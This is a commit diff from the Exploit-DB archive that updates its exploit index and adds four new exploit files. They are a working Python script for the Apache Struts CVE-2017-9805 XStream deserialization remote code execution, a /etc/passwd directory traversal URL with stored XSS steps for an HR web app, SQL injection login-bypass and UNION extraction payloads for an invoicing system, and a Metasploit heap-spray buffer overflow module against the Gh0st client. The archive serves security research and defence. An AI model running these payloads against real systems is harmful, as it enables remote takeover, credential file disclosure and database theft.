DB: 2017-09-08

4 new exploits

Tor - Linux Sandbox Breakout via X11
Tor (Linux) - X11 Linux Sandbox Breakout
Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution
Gh0st Client - Buffer Overflow (Metasploit)

TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root
TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution
Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting
Online Invoice System 3.0 - SQL Injection
This commit is contained in:
Offensive Security 2017-09-08 05:01:20 +00:00
parent a1eeba1263
commit 67b3da92e4
5 changed files with 311 additions and 2 deletions

View file

@ -9230,7 +9230,7 @@ id,file,description,date,author,platform,type,port
42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
42624,platforms/windows/local/42624.py,"Jungo DriverWizard WinDriver - Kernel Pool Overflow",2017-09-06,mr_me,windows,local,0
42625,platforms/windows/local/42625.py,"Jungo DriverWizard WinDriver - Kernel Out-of-Bounds Write Privilege Escalation",2017-09-06,mr_me,windows,local,0
42626,platforms/linux/local/42626.c,"Tor - Linux Sandbox Breakout via X11",2017-09-06,"Google Security Research",linux,local,0
42626,platforms/linux/local/42626.c,"Tor (Linux) - X11 Linux Sandbox Breakout",2017-09-06,"Google Security Research",linux,local,0
1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -15795,6 +15795,8 @@ id,file,description,date,author,platform,type,port
42560,platforms/windows/remote/42560.py,"Disk Pulse Enterprise 9.9.16 - Buffer Overflow (SEH)",2017-08-25,"Nipun Jaswal",windows,remote,0
42599,platforms/python/remote/42599.rb,"Git < 2.7.5 - Command Injection (Metasploit)",2017-08-31,Metasploit,python,remote,0
42614,platforms/windows/remote/42614.txt,"Mongoose Web Server 6.5 - Cross-Site Request Forgery / Remote Code Execution",2017-09-04,hyp3rlinx,windows,remote,0
42627,platforms/linux/remote/42627.py,"Apache Struts 2.5 < 2.5.12 - REST Plugin XStream Remote Code Execution",2017-09-06,Warflop,linux,remote,0
42630,platforms/windows/remote/42630.rb,"Gh0st Client - Buffer Overflow (Metasploit)",2017-09-07,Metasploit,windows,remote,80
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) + execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Reverse TCP /bin/sh Shell (127.0.0.1:31337/TCP) Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -38202,7 +38204,7 @@ id,file,description,date,author,platform,type,port
42069,platforms/multiple/webapps/42069.html,"Apple Safari 10.0.3(12602.4.8) / WebKit - 'HTMLObjectElement::updateWidget' Universal Cross-Site Scripting",2017-05-25,"Google Security Research",multiple,webapps,0
42074,platforms/hardware/webapps/42074.txt,"D-Link DCS Series Cameras - Insecure Crossdomain",2017-02-22,SlidingWindow,hardware,webapps,0
42075,platforms/hardware/webapps/42075.txt,"QWR-1104 Wireless-N Router - Cross-Site Scripting",2017-05-26,"Touhid M.Shaikh",hardware,webapps,0
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root",2017-05-30,"Simone Margaritelli",php,webapps,8181
42093,platforms/php/webapps/42093.py,"TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Root Remote Code Execution",2017-05-30,"Simone Margaritelli",php,webapps,8181
42094,platforms/php/webapps/42094.txt,"Piwigo Plugin Facetag 0.0.3 - SQL Injection",2017-05-30,"Touhid M.Shaikh",php,webapps,0
42095,platforms/php/webapps/42095.txt,"OV3 Online Administration 3.0 - Directory Traversal",2017-05-31,LiquidWorm,php,webapps,0
42096,platforms/php/webapps/42096.txt,"OV3 Online Administration 3.0 - Remote Code Execution",2017-05-31,LiquidWorm,php,webapps,0
@ -38408,3 +38410,5 @@ id,file,description,date,author,platform,type,port
42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0
42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0
42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0
42628,platforms/php/webapps/42628.txt,"Ultimate HR System <= 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0
42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

97
platforms/linux/remote/42627.py Executable file
View file

@ -0,0 +1,97 @@
# Exploit Title: Struts 2.5 - 2.5.12 REST Plugin XStream RCE
# Google Dork: filetype:action
# Date: 06/09/2017
# Exploit Author: Warflop
# Vendor Homepage: https://struts.apache.org/
# Software Link: http://mirror.nbtelecom.com.br/apache/struts/2.5.10/struts-2.5.10-all.zip
# Version: Struts 2.5 Struts 2.5.12
# Tested on: Struts 2.5.10
# CVE : 2017-9805
#!/usr/bin/env python3
# coding=utf-8
# *****************************************************
# Struts CVE-2017-9805 Exploit
# Warflop (http://securityattack.com.br/)
# Greetz: Pimps & G4mbl3r
# *****************************************************
import requests
import sys
def exploration(command):
exploit = '''
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
<dataHandler>
<dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
<is class="javax.crypto.CipherInputStream">
<cipher class="javax.crypto.NullCipher">
<initialized>false</initialized>
<opmode>0</opmode>
<serviceIterator class="javax.imageio.spi.FilterIterator">
<iter class="javax.imageio.spi.FilterIterator">
<iter class="java.util.Collections$EmptyIterator"/>
<next class="java.lang.ProcessBuilder">
<command>
<string>/bin/sh</string><string>-c</string><string>'''+ command +'''</string>
</command>
<redirectErrorStream>false</redirectErrorStream>
</next>
</iter>
<filter class="javax.imageio.ImageIO$ContainsFilter">
<method>
<class>java.lang.ProcessBuilder</class>
<name>start</name>
<parameter-types/>
</method>
<name>foo</name>
</filter>
<next class="string">foo</next>
</serviceIterator>
<lock/>
</cipher>
<input class="java.lang.ProcessBuilder$NullInputStream"/>
<ibuffer/>
<done>false</done>
<ostart>0</ostart>
<ofinish>0</ofinish>
<closed>false</closed>
</is>
<consumed>false</consumed>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
</entry>
<entry>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
<jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
</entry>
</map>
'''
url = sys.argv[1]
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:54.0) Gecko/20100101 Firefox/54.0',
'Content-Type': 'application/xml'}
request = requests.post(url, data=exploit, headers=headers)
print request.text
if len(sys.argv) < 3:
print ('CVE: 2017-9805 - Apache Struts2 Rest Plugin Xstream RCE')
print ('[*] Warflop - http://securityattack.com.br')
print ('[*] Greatz: Pimps & G4mbl3r')
print ('[*] Use: python struts2.py URL COMMAND')
print ('[*] Example: python struts2.py http://sitevulnerable.com/struts2-rest-showcase/orders/3 id')
exit(0)
else:
exploration(sys.argv[2])

44
platforms/php/webapps/42628.txt Executable file
View file

@ -0,0 +1,44 @@
# Exploit Title: HRM - Workable Zone : Ultimate HR System <= 1.2 - Unauthenticated Directory Traversal / Stored XSS
# Date: 2017-09-05
# Exploit Author: 8bitsec
# Vendor Homepage: http://workablezone.com
# Software Link: https://codecanyon.net/item/hrm-workable-zone-ultimate-hr-system/20182372
# Version: 1.2
# Tested on: [Kali Linux 2.0 | Mac OS 10.12.6]
# Email: contact@8bitsec.io
# Contact: https://twitter.com/_8bitsec
Release Date:
=============
2017-09-05
Product & Service Introduction:
===============================
Workable Zone is probably one of most customizable Human resourse(HR) management software for companies of all sizes.
Technical Details & Description:
================================
Multiple Stored XSS vulnerabilities found.
Directory Traversal vulnerability can disclose sensitive files.
Proof of Concept (PoC):
=======================
Stored XSS:
Logged as Employee:
Write your payload on:
Profile > Last Name
Other vulnerable fields include: First Name, Contact Number
Unauthenticated Directory Traversal:
http://localhost.com/download?type=document&filename=../../../../../etc/passwd
Credits & Authors:
==================
8bitsec - [https://twitter.com/_8bitsec]

37
platforms/php/webapps/42629.txt Executable file
View file

@ -0,0 +1,37 @@
# # # # #
# Exploit Title: Online Invoice System 3.0 - SQL Injection
# Dork: N/A
# Date: 07.09.2017
# Vendor Homepage: http://www.onlineinvoicesystem.com/
# Software Link: http://www.onlineinvoicesystem.com/index_v3.html
# Demo: http://www.onlineinvoicesystem.com/onlineinvoicesystem3/index.php
# Version: 3.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Social: @ihsansencan
# # # # #
# Description:
# The vulnerability allows an attacker to inject sql commands....
#
# Proof of Concept:
#
# Bypass
# http://localhost/[PATH]/index.php
# User: 'or 1=1 or ''=' Pass: anything
# User: anything Pass: 'or 1=1 or ''='
#
# Sql
# http://localhost/[PATH]/editclient.php?cid=[SQL]
# -5+/*!00003uNiOn*/(/*!00003SelECt*/+0x283129,/*!50000CONCAT_WS*/(0x203a20,USER()),/*!50000CONCAT_WS*/(0x203a20,DATABASE()),/*!50000CONCAT_WS*/(0x203a20,VERSION()),0x283529,(/*!50000SelECt*/+export_set(5,@:=0,(SelECt+CoUnt(*)from(information_schema.columns)where@:=export_set(5,export_set(5,@,table_name,0x3c6c693e,2),column_name,0xa3a,2)),@,2)),0x283729,0x283829,0x283929,0x28313029,0x28313129,0x28313229,0x28313329,0x28313429,0x28313529,0x28313629,0x28313729,0x28313829,0x28313929,0x28323029,0x28323129,0x28323229,0x28323329,0x28323429,0x28323529,0x28323629)--+-
#
# http://localhost/[PATH]/admin_invoice_print.php?id=[SQL]
#
# http://localhost/[PATH]/edit_invoice.php?id=[SQL]
#
# http://localhost/[PATH]/admin_invoice.php?id=[SQL]
# Etc...
# # # # #

127
platforms/windows/remote/42630.rb Executable file
View file

@ -0,0 +1,127 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'zlib'
class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'Gh0st Client buffer Overflow',
'Description' => %q{
This module exploits a Memory buffer overflow in the Gh0st client (C2 server)
},
'Author' => 'Professor Plum',
'License' => MSF_LICENSE,
'References' =>
[
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
'AllowWin32SEH' => true
},
'Payload' =>
{
'Space' => 1000,
'BadChars' => '',
'EncoderType' => Msf::Encoder::Type::AlphanumMixed
},
'Platform' => 'win',
'DisclosureDate' => 'Jul 27 2017',
'Targets' =>
[
['Gh0st Beta 3.6', { 'Ret' => 0x06001010 }]
],
'Privileged' => false,
'DefaultTarget' => 0))
register_options(
[
OptString.new('MAGIC', [true, 'The 5 char magic used by the server', 'Gh0st']),
Opt::RPORT(80)
]
)
end
def make_packet(id, data)
msg = id.chr + data
compressed = Zlib::Deflate.deflate(msg)
datastore['MAGIC'] + [13 + compressed.size].pack('V') + [msg.size].pack('V') + compressed
end
def validate_response(data)
if data.nil?
print_status('Server closed connection')
return false
end
if data.empty?
print_status('No response recieved')
return false
end
if data.size < 13
print_status('Invalid packet')
print_status(data)
return false
end
mag, pktlen, msglen = data[0..13].unpack('a' + datastore['MAGIC'].size.to_s + 'VV')
if mag.index(datastore['MAGIC']) != 0
print_status('Bad magic: ' + mag[0..datastore['MAGIC'].size])
return false
end
if pktlen != data.size
print_status('Packet size mismatch')
return false
end
msg = Zlib::Inflate.inflate(data[13..data.size])
if msg.size != msglen
print_status('Packet decompress failure')
return false
end
return true
end
def check
connect
sock.put(make_packet(101, "\x00")) # heartbeat
if validate_response(sock.get_once || '')
return Exploit::CheckCode::Appears
end
Exploit::CheckCode::Safe
end
def exploit
print_status("Trying target #{target.name}")
print_status('Spraying heap...')
for i in 0..100
connect
sock.put(make_packet(101, "\x90" * 3 + "\x90\x83\xc0\x05" * 1024 * 1024 + payload.encoded))
if not validate_response(sock.get_once)
disconnect
return
end
end
for i in 103..107
print_status("Trying command #{i}...")
begin
connect
sploit = make_packet(i, "\0" * 1064 + [target['Ret'] - 0xA0].pack('V') + 'a' * 28)
sock.put(sploit)
if validate_response(sock.get_once)
next
end
sleep(0.1)
break
rescue EOFError
print_status('Invalid')
end
end
handler
disconnect
end
end